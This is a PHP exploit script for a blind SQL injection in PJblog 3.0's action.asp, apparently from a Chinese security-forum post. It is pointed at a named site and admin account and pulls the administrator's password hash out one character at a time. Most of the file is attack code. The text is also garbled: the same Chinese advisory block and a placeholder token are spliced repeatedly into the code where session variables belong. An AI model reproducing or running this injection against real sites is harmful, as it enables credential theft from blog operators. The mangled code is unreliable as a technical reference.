<?php
/*
PJblog V3.0 0day exp
code by 小蟑螂&bink
www.0kee.com www.t00ls.net
09.04.22
*/
$url="http://www.pjhome.net"; //注入地址
$var_name="puterjam"; //管理员
$var_key="check_right";
if (影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenI"]){
$LenI=影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenI"];
}else{
$LenI=1;
}
for($i=$LenI;$i<=40;$i++){
if(影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenDo"]){
$StaAsc=影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenDo"];
}else{
$StaAsc=31;
}
echo "Scan password len:".$i." ;asc form ".$StaAsc." to 127";
for($j=$StaAsc;$j<=127;$j++){
$newurl=$url.'/action.asp?action=checkAlias&cname=firebug_plugins_firediff"%20and%20%28select%20top%201%20asc%28mid%28mem_password%2c'.$i.'%2c1%29%29%20From%20blog_member%20where%20mem_name=\''.$var_name.'\'%29%3e'.$j.'%20and%20"1"="1';
$var_pagelen=file_get_contents($newurl);
$var_newpagelen=strpos($var_pagelen,$var_key);
if($var_newpagelen == true){
影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["tmpPassWord"]=影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["tmpPassWord"].chr($j);
unset(影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenDo"]);
影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenI"]=$i+1;
doReload();
break;
}
if($j == $StaAsc+10){
doReload();
break;
}
}
}
if (影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenI"]==40 && !(影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["LenDo"])){ echo 影响版本:3.0
信息来源:零客网安 www.0kee.com
Author:bink
漏洞文件:action.asp
第14行
1
2
|
strcname=request("cname")
set checkcdb=conn.execute("select * from blog_Content where log_cname="""&strcname&"""")
|
密码是sha1加密。
相关exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
___FCKpd___3
|
此文发布时官方已经打了补丁
SESSION["tmpPassWord"]; }
function doReload(){
?>
<script language="javascript">
<!--
window.setTimeout('location.reload()',1000);
//-->
</script>
<?php
}
?>